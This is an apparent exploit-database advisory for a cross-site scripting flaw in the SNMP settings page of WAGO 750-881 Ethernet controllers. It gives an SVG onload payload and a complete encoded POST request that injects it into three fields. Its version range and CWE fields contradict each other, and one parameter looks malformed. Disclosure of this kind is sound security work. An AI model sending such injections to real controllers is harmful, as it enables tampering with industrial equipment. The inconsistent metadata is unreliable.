vendor:
Ethernet Controller 750-881
by:
SecuNinja
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Ethernet Controller 750-881
Affected Version From: 01.09.18(13)
Affected Version To: 01.08.01 (10)
Patch Exists: YES
Related CWE: N/A
CPE: 2.3:a:wago:750-881:01.09.18:*:*:*:*:*:*:*
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2018
WAGO 750-881 01.09.18 – Cross-Site Scripting
WAGO 750-881 Ethernet Controller devices, versions 01.09.18(13) and before, have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi SNMP_DESC or SNMP_LOC_SNMP_CONT field. The exploit string is "<svg/onload=alert(1)>" and the http-post-data is SNMP_DESC=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&SNMP_LOC%22%3E%3Csvg%2Fonload%3Dalert%282%29%3E&SNMP_CONT=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&SNMP_V1V2_ENABLE=SNMP_V1V2_ENABLE&SNMP1_LCOM_NAME=public&SNMP_TR_V1V2_1_IP=0.0.0.0&SNMP1_COM_NAME=public&SNMP_V1V2_TR1_VERSION=SNMP_V1V2_TR1_VERSION1&SNMP_TR_V1V2_2_IP=0.0.0.0&SNMP2_COM_NAME=public&SNMP_V1V2_TR2_VERSION=SNMP_V1V2_TR2_VERSION1&SUBMIT=SUBMIT
Mitigation:
Apply the latest security patches to the affected devices.
